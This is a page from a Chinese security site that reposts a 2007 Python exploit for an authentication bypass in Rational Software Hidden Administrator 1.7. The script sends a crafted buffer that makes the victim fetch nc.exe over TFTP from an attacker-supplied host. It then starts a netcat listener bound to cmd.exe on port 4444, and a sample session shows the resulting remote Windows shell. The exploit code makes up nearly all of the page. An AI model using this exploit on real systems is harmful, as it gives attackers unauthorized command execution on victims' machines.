首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Rational Software Hidden Administrator 1.7 Auth Bypass Exploit
来源:ahmed[at]rewterz.com 作者:ahmed 发布时间:2007-05-21  
####################################################################################
#           Hidden Administrator Authenticaiton Bypass Exploit                     #
#                   ahmed[at]rewterz.com                                           #
#            http://www.securityfocus.com/bid/24049                                #
#                                                                                  #
# C:\>python rewt-ha-exp.py                                                        #
# Usage: rewt-ha-exp.py -h <host ip> -p <port> -t <tftpd server ip>                #
# make sure nc.exe exists on tftpd server                                          #
#                                                                                  #
# C:\>telnet 192.168.1.4 4444                                                      #
# C:\>python rewt-ha-exp.py -h 192.168.1.4 -p 3128 -t 192.168.1.105                #
# [+] Connecting to 192.168.1.4                                                    #
# [+] Uploading Files                                                              #
# [+] DONE [+]                                                                     #
# [+] Now Connect to port 4444 on victim IP !!!                                    #
#                                                                                  #
# C:\>telnet 192.168.1.4 4444                                                      #
# Microsoft Windows XP [Version 5.1.2600]                                          #
# (C) Copyright 1985-2001 Microsoft Corp.                                          #
# C:\ha_server>                                                                    # 
####################################################################################


import socket
import struct
import time
import sys
import getopt


def usage():
	print "\n"
	print "######################################################"
	print "# Hidden Administrator Authentication Bypass Exploit #"
	print "#           Coded By ahmed[at]rewterz.com            #"
	print "######################################################"
	print "\n"
	print "Usage: %s -h <host ip> -p <port> -t <tftpd server ip>" % sys.argv[0]
	print "make sure nc.exe exists on tftpd server\n"

def exploit():
	h ="%X" % (130+len(tftpd))
        buff1='_file_manager_operations_copy_files_Loc_Rem_c:\\^file\r\n\x0brewt_ha.bat'
	buff1+='\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
	buff1+='\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
	buff1+='\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
	buff1+='\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
	buff1+='\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
	buff1+='\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
	buff1+='\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
	buff1+='\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
	buff1+='\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
	buff1+='\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
	buff1+='\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
	buff1+='\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
	buff1+='\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
	buff1+='\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
	buff1 += ('\\x' + h).decode('string_escape')
	buff1 += '\x00\x00\x00\x00\x00\x00\x00'
	buff1+='\x00tftp -i ' + tftpd + ' GET nc.exe c:\\nc.exe                           '
	buff1+='\r\nc:\\nc.exe -L -d -p 4444 -e cmd.exe                 \r\n\r\n         '
	buff1+='      \r\n\r\n_file_manager_operations_get_cur_dir_c:\r\n'
	try:
		print "[+] Connecting to %s" %host
	        s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
		connect=s.connect((host,int(port)))
		print "[+] Uploading Files"
		s.send(buff1)
	        time.sleep(2)
	        s.send('+run_C:\\rewt_ha.bat|\r\n')
	        time.sleep(1)
	        print "[+] DONE [+]"
                print "[+] Now Connect to port 4444 on victim IP !!!"
	except:
		print "[+] Could not connect to the server"


if len(sys.argv)<7:
       usage()
       sys.exit()
try:
       options = getopt.getopt(sys.argv[1:], 'h:p:t:')[0]
except getopt.GetoptError, err:
       print err
       usage()
       sys.exit()


for option, value in options:
       if option == '-h':
           host = value
       if option == '-p':
           port = int(value)
       if option == '-t':
           tftpd=value
exploit()

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·LeadTools Raster Thumbnail Obj
·Zomplog <= 3.8 (mp3playlist.ph
·LeadTools Thumbnail Browser Co
·LeadTools JPEG 2000 COM Object
·MagicISO <= 5.4(build239) .cue
·FAQEngine <= 4.16.03 (question
·SimpNews <= 2.40.01 (print.php
·Wordpress 2.1.3 admin-ajax.php
·CA BrightStor Backup 11.5.2.0
·LeadTools Raster Variant (LTRV
·MS Windows Vista forged ARP pa
·Microsoft IIS 6.0 (/AUX/.aspx)
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved